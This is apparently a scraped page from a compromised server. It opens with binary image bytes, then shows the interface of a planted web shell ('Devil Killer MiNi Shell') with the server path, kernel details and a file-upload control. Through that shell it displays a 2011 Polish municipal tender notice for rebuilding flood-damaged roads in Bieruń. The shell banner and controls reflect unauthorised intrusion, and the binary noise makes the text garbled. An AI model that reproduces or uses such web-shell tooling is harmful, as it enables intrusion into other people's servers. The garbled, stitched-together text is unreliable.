JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110407/69280-N-2011.html

<p class="kh_header"><b>Bieruń: Odbudowa i modernizacja dróg gminnych zalanych 
i zniszczonych wodami powodziowymi w dzielnicy Bijasowice 
w Bieruniu -ul. Groblana, ul. Lipcowa, ul. Żywiczna</b><br>
<b>Numer ogłoszenia: 69280 - 2011; data zamieszczenia: 07.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa i modernizacja dróg gminnych zalanych 
i zniszczonych wodami powodziowymi w dzielnicy Bijasowice 
w Bieruniu -ul. Groblana, ul. Lipcowa, ul. Żywiczna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem   zamówienia jest :
Odbudowa i modernizacja dróg gminnych w Bieruniu:
- ul. Groblanej  na długości 620 m o szerokości zmiennej od 3,0 do 5,0 m
- ul. Lipcowej na odcinku od skrzyżowania z ul. Bijasowicką do ul. Żywicznej , długości 290 m, o szerokości
- ul. Żywicznej na długości 575 m o szerokości   
2.	Zakres rzeczowy  został określony  w przedmiarze robót , dokumentacji technicznej 
i specyfikacji technicznej wykonania i odbioru robót  remontowych, i obejmuje m .in. :
	 frezowania nawierzchni bitumicznej grub. do 10 cm   ~ 2722 m2  
	 roboty ziemne pod zabudowę rur ochronnych oraz przy budowie elementów odwodnienia
  (rowy,kanały, studzienki ściekowe) - 2559,8 m3   , odwóz nadmiaru ziemi - 1678,6 m3 
	układanie rur ochronnych dla zabezpieczenia kabli - 69 m
	wycinkę drzew o średnicy od 10 do 55 cm - 15 szt. z mechanicznym karczowaniem pni,  
  odwozem ściętych karpin i gałęzi,
	zabudowę krawężników betonowych na ławie betonowej: wystających - na dł. 453 m,  
  wtopionych - na dł. 96,8 m; oporników drogowych na ławie bet. - 550 m
	wykonanie ścieku przykrawężnikowego z kostki betonowej - 85,2 m 2 
	budowę kanalizacji deszczowej 315 dł.314 m, 7 studni  1000 oraz 7 studzienek 
   ściekowych  500,
wykonanie warstw konstrukcyjnych  jezdni :dolnej warstwy podbudowy z żużla grub. 20 cm  
   - 2752 m2 , grub.10 cm - 1225 m2 , górnej warstwy z tłucznia gr. 10 cm - 1440 m2    , 
  kruszywa łamanego grub. 15 cm - 2228 m 2  
	wykonanie wjazdów do posesji z kostki brukowej gr. 8 cm na podbudowie z kruszywa 
   łamanego  grub. 25 cm - 165,6 m 2 oraz dojść dla pieszych - 69,2 m 2 
	ułożenie nawierzchni z mieszanek mineralno-bitumicznych grubości 5+4 cm - 4858,9 m2   
	ręczne plantowanie poboczy i humusowanie z obsianiem  trawą - 5760,8 m2 
	regulację pionową studzienek dla : włazów kanałowych - 14 szt. (z wymianą 6 płyt   
   żelbetowych), zaworów wodociągowych i gazowych - 13 szt., kratek ściekowych - 1 szt.
	wymianę 2 przepustów  500 o łącznej dł. 13,0 m   
	wykonanie ubezpieczenia skarp rowu płytami ażurowymi na pow. 80 m2 
	zabudowę poręczy ochronnych U-11a w obrębie 2 przepustów na długości 2 x 24 m ,
	demontaż starego progu zwalniającego i ponowny montaż  z nowych elementów z tworzyw 
   sztucznych o  szer. 3,5 m (elementy 900x500x50)  wraz z oznakowaniem pionowym,
	inwentaryzację geodezyjną powykonawczą,
	pomiary nośności podbudowy - 6 punktów,
	uporządkowanie terenu przyległego,
	oznakowanie pasa drogowego na czas prowadzenia robót (zamawiający posiada projekt    
   organizacji ruchu) oraz odtworzenie istniejącego oznakowania pionowe.
3.Warunki i wymagania :
	Przed przystąpieniem do robót wykonawca zobowiązany jest do zinwentaryzowania wszystkich urządzeń obcych występujących na terenie przewidzianym  pod prace budowlane. Wszystkie roboty prowadzone w pobliżu tych urządzeń należy prowadzić przy użyciu lekkiego sprzętu, aby nie doprowadzić do ich uszkodzenia.
	W trakcie prowadzenia robót należy umożliwić mieszkańcom dojście i dojazd do posesji.
	W trakcie realizacji inwestycji należy : 
   a/ zapewnić obsługę geodezyjną
   b/ wznowić zniszczone w trakcie robót budowlanych znaki geodezyjne
   c/ w przypadku uszkodzenia urządzeń - wykonawca pokrywa koszty usunięcia awarii oraz 
       koszty poniesionych strat eksploatacyjnych;
	Obowiązkiem wykonawcy jest zapewnienie kadry kierowniczej - kierownika budowy;
	W kosztorysie ofertowym w kosztach pośrednich należy ująć koszty :
   a/ doprowadzenia terenu budowy po zakończeniu budowy do stanu pierwotnego
   b/ dostawy i wykonania oznakowania pasa drogowego na czas budowy zgodnie z 
       zatwierdzonym projektem organizacji ruchu
   c/ składowania materiałów rozbiórkowych
   d/ dowozu (poboru) brakujących mas ziemnych i odwozu nadmiaru mas ziemnych na 
       odkład
   e/ dokumentacji fotograficznej wszystkich obiektów kubaturowych , ogrodzeń i innych    
       obiektów sąsiadujących z przebudowywana droga gminną, która należy wykonać przed 
       przystąpieniem do robót oraz w trakcie robót (szczególnie elementy ulegające zakryciu)
    f/ nadzorów technicznych ze strony właścicieli uzbrojenia terenu
    g/ wszystkich niezbędnych badań i sprawdzeń;
	Jeżeli w dokumentacji technicznej, specyfikacji technicznej wykonania i odbioru robót oraz SIWZ określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to , że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w projekcie i specyfikacji technicznej wykonania i odbioru robót. Podane w opisach nazwy własne nie maja na celu naruszenie art.29 i art. 7 ustawy pzp, a maja jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równano ważne pod warunkiem spełnienia tego samego poziomu jakościowego, technologicznego i estetycznego.
	Zastosowane materiały i wyroby muszą posiadać odpowiednie dokumenty dopuszczające do stosowania w budownictwie, zgodnie z obowiązującym w tym  zakresie prawem. Wykonawcę zobowiązuje się do uzgadniania z zamawiającym użycia materiałów i wyrobów wpływających na poprawę estetyki i wyglądu remontowanych dróg   itp.
4.	Powyższe roboty objęte są podatkiem VAT w wysokości 23%.
5.	 Zamawiający nie przewiduje : zamówień uzupełniających, zaliczek na poczet wykonania zamówienia, aukcji elektronicznej, zawarcia umowy ramowej dynamicznego systemu zakupów w rozumieniu ustawy. 
6.	Zamawiający zastrzega, że nie dopuszcza powierzenia całości zadania podwykonawcom .
7.	Zamawiający nie dopuszcza składania ofert częściowych i  wariantowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.24.51-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zasady wnoszenia wadium:
Wadium w wysokości  30 000,00 zł ( słownie: trzydzieścitysięcyzł.00/100) musi być wniesione   w terminie, który został podany w punkcie Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem tzn. przelać z rachunku bankowego
wykonawcy na rachunek bankowy zamawiającego w BS O/Tychy numer konta: 
26 84350004 0000 0000 6158 0001 z adnotacją:
Wadium - nr sprawy: ZP. 2710.22.2011 Przetarg nieograniczony na wybór wykonawcy
zamówienia p.n. Odbudowa i modernizacja dróg gminnych zalanych i zniszczonych wodami powodziowymi w dzielnicy Bijasowice w Bieruniu - ul. Groblana, ul. Lipcowa, ul. Żywiczna.
Wniesienie wadium w pieniądzu- oznacza uznanie kwoty wadium ,wpłaconego przelewem,
na rachunku zamawiającego.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego 
w Bieruniu, nie później niż do godz. 12:00 w dniu otwarcia ofert.
Wadium może być wniesione w następujących formach:
1) w pieniądzu przelewem,
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) w gwarancjach bankowych,
4) w gwarancjach ubezpieczeniowych,
5) w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy
z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. 2000.109.
1158 z późniejszymi zmianami).
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz
z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się o udzielenie
nin. zamówienia, należy wskazać wszystkich wykonawców wspólnie ubiegających się
o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie
z art.24 ust.2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.

2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz                      z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1) Zgodnie z art. 46 ust.1 ustawy pzp zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
2) Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3) Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4) Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez zamawiającego.

3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy pzp zamawiający zatrzymuje wadium wraz                                  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                    w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie                                                                         
       przedłożonego przez wykonawcę : 
       - oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
       W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  
       wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie : 
       Wykonali należycie  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a  
       jeżeli okres prowadzonej działalności jest krótszy - to w tym okresie - roboty  remontowe lub 
       inwestycyjne w zakresie budowy , przebudowy, odbudowy lub remontu dróg o nawierzchniach 
       bitumicznych o łącznej wartości brutto min. 1 500 000 zł, gdzie przynajmniej 2 roboty dotyczyły 
       dróg o długości min. 500 mb każda . 
       Ocena spełnienia warunku będzie dokonana wg zasady spełnia / nie spełnia, na podstawie 
       przedłożonego przez Wykonawcę:
 -   oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy pzp)
-    dokumentów : wykazu wykonanych robót  remontowych lub inwestycyjnych  w zakresie  
     budowy, przebudowy, odbudowy lub remontu dróg o nawierzchniach bitumicznych,
     o łącznej wartości brutto min.  1 500 000 zł. gdzie przynajmniej 2 roboty dotyczyły dróg        
     o długości min. 500 mb każda oraz dokumentów (np. referencji) potwierdzających, że 
     roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo 
     ukończone .
Za  wykonali zamawiający rozumie, że roboty  zostały zakończone i odebrane protokołami końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania ofert,           a jeżeli okres jest krótszy - w tym okresie.
 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy   wykazać , że łącznie wykonali oni roboty o łącznej wartości brutto co najmniej 1 500 000 zł. ,  a warunek wykonania 2 robót na drogach o długości min. 500 mb każda spełnia przynajmniej jeden  z nich w całej rozciągłości lub dwóch wykonawców spełnia go łącznie poprzez wykazanie się realizacją po jednej  z ww. robót .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia:
       Dysponują co najmniej jedną osobą posiadającą uprawnienia bez ograniczeń do kierowania 
       robotami drogowymi, która będzie uczestniczyć w wykonaniu zamówienia.
       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie 
        przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp)
        - dokumentu - wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, 
          w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości , wraz 
          z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania 
          zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją 
          o podstawie do dysponowania tymi osobami.   

 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy   
 wykazać, że warunek spełnia przynajmniej jeden z wykonawców</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia:.
       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie          
        przedłożonego przez wykonawcę :
        - oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  
        wykazać, że warunek spełnia przynajmniej jeden z wykonawców</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Każdy wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1. Oferta jest jawna w całości / części. Strony oferty od ....     do .....    stanowią tajemnicę       przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą być ujawnione innym uczestnikom postępowania.
     W przypadku braku złożenia oświadczenia lub braku wypełnienia formularza ofertowego w tym zakresie, zamawiający uzna, że oferta wykonawcy jest jawna w całości.
       2. Oświadczenie, czy część zamówienia zostanie powierzona podwykonawcom. 
           W przypadku braku złożenia oświadczenia lub braku wypełnienia formularza ofertowego 
           w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia sam bez 
           powierzenia części zamówienia podwykonawcom.
3. Oświadczenie podmiotów występujących wspólnie (konsorcjum, spółka cywilna) -
    w przypadku ich udziału w postępowaniu.
4. Oświadczenie osoby/ osób podpisujących ofertę, że jest / są uprawniona/-e do zaciągania
    zobowiązań i składania oświadczeń w imieniu wykonawcy.
5. Oświadczenie o zapoznaniu się z treścią SIWZ i jej akceptacji.
       6. Oświadczenie o  związaniu ofertą  przez okres 30 dni od daty upływu terminu składania 
            ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
